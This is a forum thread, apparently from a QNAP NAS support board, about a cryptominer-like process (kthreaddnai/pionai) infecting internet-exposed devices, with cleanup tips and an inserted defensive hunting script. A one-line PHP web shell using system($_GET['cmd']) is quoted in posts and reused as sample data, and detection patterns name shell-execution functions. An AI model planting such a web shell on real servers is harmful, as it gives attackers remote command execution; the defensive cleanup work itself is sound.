Unknown Thread kthreaddnai

kameha
Starting out
Posts: 10
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha » Wed Nov 14, 2018 3:09 pm

Both Gitea and Nextcloud are exposed through Container Station.

versieck
First post
Posts: 1
Joined: Fri Sep 28, 2018 3:01 pm

Re: Unknown Thread kthreaddnai

Post by versieck » Wed Nov 14, 2018 7:39 pm

I encountered the same problem a few days ago.
I have no idea where this process originates from or what it does. It's a complete mystery.
Upgrading to the latest firmware (4.3.5.0756) did not solve the problem.
I did however install the Malware Remover and it did find some malware that was removed.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /share/CACHEDEV1_DATA/.log/.cgi_log.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//autorun.sh.infected.

App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/config//OewrradzZkb.


App Name: Malware Remover
Category: Malware Removal
Message: [Malware Remover] Removed malicious file or folder. Path: /tmp/.remover_B1KPMM.

After a reboot the pionai process was gone and my CPU usage was back to normal.
The Malware Remover will now scan my system every day at 03:00 AM to keep it clean.

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Thu Nov 15, 2018 12:32 pm

The malware remover ran for me and did not find anything. After the restart, no process was visible for 2 hours. The process came back overnight. QNAP Support has not commented yet.

OneCD
Ask me anything
Posts: 6021
Joined: Sun Aug 21, 2016 10:48 am
Location: "... there, behind that sofa!"

Re: Unknown Thread kthreaddnai

Post by OneCD » Thu Nov 15, 2018 1:18 pm

KV17uwe wrote:
Thu Nov 15, 2018 12:32 pm
After the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?

production NAS: TS-569 Pro with Debian 9.9 'Stretch' (power on/off times are < 1 minute)
backup NAS: TS-559 Pro+ with QTS 4.2.6 #20190322

one.cd.only@gmail.com

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Thu Nov 15, 2018 5:09 pm

OneCD wrote:
Thu Nov 15, 2018 1:18 pm
KV17uwe wrote:
Thu Nov 15, 2018 12:32 pm
After the restart, no process was visible for 2 hours. The process came back overnight.
Is any part of your NAS exposed to the Internet?
yes.

cufiler
First post
Posts: 1
Joined: Tue Jun 05, 2012 3:10 pm

Re: Unknown Thread kthreaddnai

Post by cufiler » Thu Nov 15, 2018 6:13 pm

I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone calls it from the internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to the find commands posted by Kameha, I found some PHP files that had been uploaded to run commands on my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Fri Nov 16, 2018 1:05 pm

cufiler wrote:
Thu Nov 15, 2018 6:13 pm
I had the same issue. There is a program at /tmp/pionai and Clamscan confirms it's a virus (/usr/local/bin/clamscan -i -r /tmp). I guess it enters through HTTP cgi-bin. After cutting port 80 it did not run anymore. So I guess it runs because someone calls it from the internet.

So, I edited /etc/config/php.ini and /etc/config/php.user.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
allow_url_fopen = Off
safe_mode = On
safe_mode_gid = On

Thanks to the find commands posted by Kameha, I found some PHP files that had been uploaded to run commands on my OS (CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>)
What are these settings?

I have already deleted the pionai folder under /tmp/. I also closed port 80. I have not yet applied the settings in the INI files.

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Fri Nov 16, 2018 1:14 pm

The services are back :(

mneiger
New here
Posts: 6
Joined: Thu May 05, 2016 2:57 am

Re: Unknown Thread kthreaddnai

Post by mneiger » Fri Nov 16, 2018 10:09 pm

I have the same critter in my TS-251.
I chased down all files of size 37472 (god, init, eth1, etc.).
I suspect it also uses a few php files in /share/Web which I deleted
47D51F0071A7AA3AF1ED0669843E113B.php
images.php

good luck
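The manual hunting that cufiler and mneiger describe above (grepping the web share for one-line PHP shells such as @system($_GET['cmd']), and chasing every dropped binary of exactly 37472 bytes) can be scripted. The script below is an added example written for this page; it is not code posted in the thread or shipped by QNAP. The paths /share/Web and /tmp and the size 37472 are taken from the posts; the list of PHP function names, the obfuscation patterns and the "executable running from /tmp or a hidden share directory" check are my assumptions about what such a dropper looks like, and the sample files it builds are constructed test data. Two caveats on the php.ini hardening in cufiler's post: safe_mode was removed in PHP 5.4, so that line is a no-op on any current PHP, and disable_functions is only honoured in the main php.ini (it is PHP_INI_SYSTEM), never from a .user.ini file.

```shell
#!/bin/sh
# Added example (not from the thread): hunt for PHP web shells under the web
# share and for dropped binaries of one fixed size, as posters above did by hand.
# Defaults follow the thread: /share/Web, /tmp and 37472 bytes. Only POSIX
# find/grep/readlink are used so it also runs in the NAS busybox shell.

WEB_ROOT="${WEB_ROOT:-/share/Web}"
DROP_DIR="${DROP_DIR:-/tmp}"
SUSPECT_SIZE="${SUSPECT_SIZE:-37472}"

# ERE for one-line shells: a command-execution function fed straight from a
# request variable (the posted shell is @system($_GET['cmd'])), or eval() of an
# obfuscated payload. Assumed indicators; legitimate admin tools may also match.
SHELL_PATTERN='(system|exec|passthru|shell_exec|popen|proc_open|assert|eval)[[:space:]]*\([^)]*\$_(GET|POST|REQUEST|COOKIE)|eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)'

# find_webshells DIR: print PHP files under DIR whose source matches SHELL_PATTERN.
# "-exec ... {} +" batches files into few grep calls and runs nothing if none exist.
find_webshells() {
    find "$1" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.php5' -o -name '*.inc' \) \
        -exec grep -lE "$SHELL_PATTERN" {} + 2>/dev/null
}

# find_by_size DIR BYTES: print regular files under DIR of exactly BYTES bytes
# (mneiger found many copies of one 37472-byte binary: god, init, eth1, ...).
find_by_size() {
    find "$1" -type f -size "${2}c" 2>/dev/null
}

# list_tmp_processes: print "PID EXE" for running processes whose executable
# lives under /tmp or a hidden directory on a share, as /tmp/pionai did.
list_tmp_processes() {
    for proc in /proc/[0-9]*; do
        exe=$(readlink "$proc/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/share/*/.*/*) echo "${proc#/proc/} $exe" ;;
        esac
    done
}

# make_sample_tree DIR: constructed sample data so the script can be tried
# offline: one planted shell (the body cufiler posted), one benign page and
# two blobs, only one of which has the suspect size.
make_sample_tree() {
    mkdir -p "$1/web" "$1/tmp"
    cat > "$1/web/images.php" <<'EOF'
CMD2018<br><pre><?php @system($_GET['cmd']);?></pre>
EOF
    cat > "$1/web/index.php" <<'EOF'
<?php echo "Welcome to the NAS web share"; ?>
EOF
    head -c "$SUSPECT_SIZE" /dev/zero > "$1/tmp/god"
    head -c 100 /dev/zero > "$1/tmp/harmless"
}

# Demo against the constructed tree, then against the real paths if they exist.
sample=$(mktemp -d)
make_sample_tree "$sample"
echo "== web shells in sample tree:"; find_webshells "$sample/web"
echo "== ${SUSPECT_SIZE}-byte files in sample tree:"; find_by_size "$sample/tmp" "$SUSPECT_SIZE"
rm -rf "$sample"
[ -d "$WEB_ROOT" ] && { echo "== web shells under $WEB_ROOT:"; find_webshells "$WEB_ROOT"; }
[ -d "$DROP_DIR" ] && { echo "== ${SUSPECT_SIZE}-byte files under $DROP_DIR:"; find_by_size "$DROP_DIR" "$SUSPECT_SIZE"; }
echo "== processes running from /tmp or hidden share dirs:"; list_tmp_processes
```

On the NAS, run it once as admin over SSH and again after a reboot; a file or process that reappears after the Malware Remover has cleaned up points at the persistence that several posters hit. Treat every hit as a lead to inspect, not as proof: the grep will also flag any legitimate script that passes request parameters to system().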

Trexx
Experience counts
Posts: 4699
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Unknown Thread kthreaddnai

Post by Trexx » Fri Nov 16, 2018 10:59 pm

You might try using the new Malware Remover to see if that cleans it better. BUT that is NOT going to prevent infection (it doesn't run in real time), it only removes it. The only way to 100% prevent infection is not to expose your NAS to the internet. A full-featured IPS/IDS platform, reverse proxies, etc. can help mitigate risk as well.
Paul

Model: TS-877-1600 FW: 4.3.6.x
QTier (HDD): [RAID-5] 6 x 3TB HGST DeskStar NAS QTier (SSD): [RAID-1] 2 x 525GB Crucial MX300 m.2's
(SSD): [RAID-1] 2 x 500GB Evo 860
RAM: Kingston HyperX Fury 32GB Kit DDR4-2666
GPU: EVGA GTX 1060, ACX 2.0(1 Fan), 6GB
UPS: CyberPower AVR1350 Ext. Backup: USB 3.0 Seagate 5TB
Media Boxes: Nvidia ShieldTV Pro, AppleTV 4, Roku Stick

Model: TVS-673 32GB FW: 4.3.6.x Test/Backup Box
-----------------------------------------------------------------------------------------------------------------------------------------
NAS RAID Rebuild Times | Live QTS Videos | | QNAP NAS Guide | Information needed when you ask for HELP | QNAP Links, Tutorials, etc.
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq

dolbyman
Guru
Posts: 12905
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Unknown Thread kthreaddnai

Post by dolbyman » Fri Nov 16, 2018 11:41 pm

And everyone, please open tickets with QNAP so they can investigate and improve the malware removal.

kameha
Starting out
Posts: 10
Joined: Wed Mar 28, 2018 8:45 am

Re: Unknown Thread kthreaddnai

Post by kameha » Sat Nov 17, 2018 5:49 pm

Hello !

I completely reinstalled my NAS in the last few days (data backup + full disk format on another PC).
All was OK until I reinstalled CodexPack and PhotoStation yesterday, so I suspect it's coming from one of them.

Still investigating...

KV17uwe
New here
Posts: 7
Joined: Wed Jul 13, 2016 3:46 pm

Re: Unknown Thread kthreaddnai

Post by KV17uwe » Mon Nov 19, 2018 2:19 pm

Closing port 80 has brought peace for the time being. QNAP still has not processed my ticket.

maestro72x
Getting the hang of things
Posts: 62
Joined: Thu Jun 03, 2010 5:16 am

Re: Unknown Thread kthreaddnai

Post by maestro72x » Wed Nov 21, 2018 2:12 am

Any luck getting rid of it? I'm having the same issues.

Elbows
Starting out
Posts: 27
Joined: Thu May 07, 2009 9:58 pm

Re: Unknown Thread kthreaddnai

Post by Elbows » Fri Nov 23, 2018 4:48 am

I had the 'pionai' process running and raised a helpdesk ticket.

I've posted the fix I was given here: viewtopic.php?f=182&t=144954&p=694152#p694152

It worked for me :-)
QNAP TS670 Pro (DEV/Backup box)
V4.3.5.n (latest)
5x Seagate 8TB Ironwolf RAID 5
QNAP TVS1282 (PRD box)
V4.3.5.n(latest)
5x Seagate 8TB Ironwolf RAID 5
Riello VSD 1500 UPS
